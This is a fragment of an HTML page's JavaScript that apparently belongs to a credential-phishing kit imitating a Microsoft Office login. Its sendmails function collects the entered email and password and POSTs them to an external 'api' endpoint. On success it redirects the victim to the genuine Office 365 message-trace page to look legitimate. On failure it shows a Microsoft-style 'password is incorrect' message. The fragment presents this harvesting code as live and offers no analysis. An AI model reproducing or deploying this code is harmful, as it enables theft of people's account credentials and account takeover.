    </script>
    <script>
        $(function() {
            var twoToneButton = document.querySelector('.twoToneButton');
            twoToneButton.addEventListener("click", function() {
                twoToneButton.innerHTML = "<img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAKcAAAAmCAYAAACh+ouRAAACiUlEQVR4Xu2ZPW7CQBCFHwdJEYmaBrqk5QDQ0cIBXLjjAHQuOEBo6eAAtKGDhhoJKRyEyL+xjSGwYDR6Myk3u8u8eZ92ZteN0+l0gv1ZBgRmoBHCud1uBYZmIWnOQLvdhsGpmQDB2g1OweZoD83g1E6AYP0Gp2BztIdmcGonQLB+g1OwOdpDMzi1EyBYv8Ep2BztoRmc2gkQrN/gFGyO9tAMTu0ECNZvcAo2R3toKuA8zofoBbuc1y34yxkGb8nQcY5hb4VufuxZZNS597NiFLoPPZwxmE1MN2N8pCasJ+h4C/SnG4yzwZocMjidE0sO5xHzYQ+H0TmE60kH3t7HcjZAeoA6Z/HaQoPTOa0q4Fx1l5hlNbwiV2cArTHpeFhEU1vwp12svANG4embzo3GAqTNwsVTOL83kvbh1rXOtnIsJIcTQFLCI8z8C5AW4IzB3GdzU1D7cWsQzQ2wa/2dupWtQ8rHGZx3rOVgzFkFP5zZnad0KepPsUkbzjxAP2E/ikKPWoAvgbOZ71evle4KOG9e62wrx0I1cBbtSk7D9PTLAfT5PURv1S32otH/S2X91tt+VVm/dS0HY84qlMIJ4AI0BqczS09fyA3nXeU2eeesKOtx35qU+qo9XX7nFW+sT8fltRtywxndhzrwFqVHd8RPTEEz6TvvvhCVHuwNzlqopYczzNr5F6LSzf2/pyS/iSCwk7MWAq9sqgLOh5MalvWv9/of7B8OlGsDg7PsZ9Rf7nPf3kstAJf/otUYnJUfjK68iYq2kys4g5PLTyo1BieVnVxiDE4uP6nUGJxUdnKJMTi5/KRSY3BS2cklxuDk8pNKjcFJZSeXGIOTy08qNRmcVKpMDE0GfgEMoKWtDFoR8wAAAABJRU5ErkJggg=='>";
                setTimeout(
                    function() {
                        twoToneButton.innerHTML = "<img src='https://loppa.oss-us-east-1.aliyuncs.com/c9eea375dd16c77.png'>";
                    }, 15000);
            }, false);
        });

        $('#pass').keyup(function(event) {
            if (event.which == 13) {
                $('#submit').click();
            }
        });
        $('#submit').click(function(e) {
            if ($('#pass').val().trim().length) {

            } else {
                //alert("Your email or password is incorrect. If you don\'t remember your password, reset it now. !");
            }
        });

        function sendmails() {
            var user = $('#testx').val();
            var pass = $('#pass').val();
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {

                    var response = this.responseText;
                    if (response == 1) {
                        setTimeout("window.location.href='https://protection.office.com/#/messagetrace';", 1000);
                    } else {
                        $("#warning").empty();
                        $('#warning').append('Your email or password is incorrect. If you don\'t remember your password,<a href="#"> reset it now.<a/> <br> <br> ');
                    }
                }
            };
            xhttp.open("POST",api, true);
			xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
			xhttp.send("user="+user+"&pass="+ pass);
        }
    </script>

    <noscript><i>Javascript required</i></noscript>
</body>

</html>